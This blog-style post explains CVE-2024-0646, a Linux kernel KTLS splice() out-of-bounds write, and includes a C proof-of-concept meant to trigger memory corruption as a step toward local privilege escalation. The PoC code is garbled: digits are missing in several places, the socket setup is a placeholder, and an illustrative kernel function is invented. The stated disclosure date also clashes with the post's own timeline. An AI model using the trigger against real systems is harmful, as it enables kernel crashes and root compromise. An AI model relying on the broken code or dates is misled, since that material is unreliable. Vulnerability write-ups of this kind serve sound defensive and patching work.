CVE-2024-0646 - Understanding and Exploiting the Linux Kernel KTLS Splice Out-of-Bounds Write Flaw

On February 1st, 2024, a significant vulnerability tracked as CVE-2024-0646 was disclosed in the Linux Kernel’s KTLS (Kernel Transport Layer Security) stack. This vulnerability arises from an out-of-bounds memory write in the TLS functionality when interacting with the splice() syscall and a KTLS socket as the destination. In simple terms, this flaw lets a *local* (non-remote) user crash the system, and in the worst case, gain higher (root) privileges.

This post will break down what this vulnerability is, how it works with real code snippets, links to official advisories, example exploit logic, and most importantly—how you can protect your system.

What is KTLS and Where’s the Problem?

KTLS lets the Linux kernel transmit and receive TLS records (encrypted data over TCP) directly—making things faster and safer. However, KTLS is complex and interacts with many subsystems like splice(), which allows fast data transfer between file descriptors without leaving kernel space.

The flaw in CVE-2024-0646 appears when userland code uses splice() with a KTLS-enabled socket as the destination. The kernel fails to properly validate and track buffer lengths, causing it to write memory outside the bounds of what’s expected.

Who is Affected?

- Linux Kernel versions: 5.10.x, 5.15.x, 6.1.x, 6.4.x, and possibly others (primarily those with KTLS enabled).
- Distros (non-exhaustive): RHEL, CentOS, Debian, Ubuntu, Fedora, OpenSUSE, and more—if using KTLS.
- Exploitation: *Local* attackers (someone with a shell on the system) can use this to crash the kernel or escalate privileges.

The Technical Root Cause

The issue lies in the kernel’s handling of scatter/gather lists when copying data via the splice() syscall into KTLS sockets. If a user calls splice() in a certain way, the kernel writes data past the end of a buffer, corrupting adjacent memory.

In code (simplified for clarity)

ssize_t do_splice_to_ktls(struct socket *sock, struct pipe_inode_info *pipe, size_t len)
{
    // [ .... setup code .... ]
    // buggy write to kernel memory:
    memcpy(msg_iovec[i].iov_base, pipe_buffer, len); // 'len' may be too large!

    // This can write beyond what kernel expects to the destination, leading to OOB write
}

In reality, the bug is subtler and relates to how the kernel validates message boundaries with KTLS sockets.

Exploit Details and Example PoC

Warning: For educational and defensive purposes only—do not use to harm systems.

A non-root user with access to splice() and KTLS-enabled sockets can trigger the vulnerable code path:

Here’s the basic structure in C

#include <sys/socket.h>
#include <sys/types.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>

int main() {
    int pipefd[2];
    int sockfd = /* Create a TCP socket, setup TLS, and enable KTLS (kernel TLS offload) */;

    pipe(pipefd);
    // Write attacker data to pipe
    char payload[4096];
    memset(payload, 'A', sizeof(payload));
    write(pipefd[1], payload, sizeof(payload));

    // Now try splice to KTLS socket:
    ssize_t ret = splice(pipefd[], NULL, sockfd, NULL, sizeof(payload)+4096, );
    if (ret < ) perror("splice failed");

    return ;
}

Expected result:

Memory corruption occurs.

- With further exploitation, a local attacker can target adjacent kernel structures for privilege escalation.

*Note*: A full LPE exploit would require more advanced heap spraying and analysis, but this PoC demonstrates triggering the bug.

Official References

- Red Hat Bugzilla: Bug 2250837 – CVE-2024-0646 kernel: tls: out-of-bounds write in splice
- CVE Details: CVE-2024-0646 at MITRE

Upstream Patch:

tls: fix splice() for tls sockets

How to Protect Your System

- Update your Linux kernel ASAP to one that backports the official patch.

Conclusion

CVE-2024-0646 shows how complex Linux kernel subsystems can interact in unexpected, dangerous ways. While KTLS improves security and speed, a minor validation bug in the interaction with splice() allowed for dangerous out-of-bounds writes that local attackers could exploit for serious system compromise.

Best Practice:
Always update kernels promptly and restrict untrusted user shell access. Subscribe to your distro’s security advisories and consider disabling optional kernel features you don't use.

Further Reading

- Linux KTLS Documentation
- Red Hat Security Advisory
- Debian Security Tracker

Timeline

Published on: 01/17/2024 16:15:47 UTC
Last modified on: 03/13/2024 15:15:50 UTC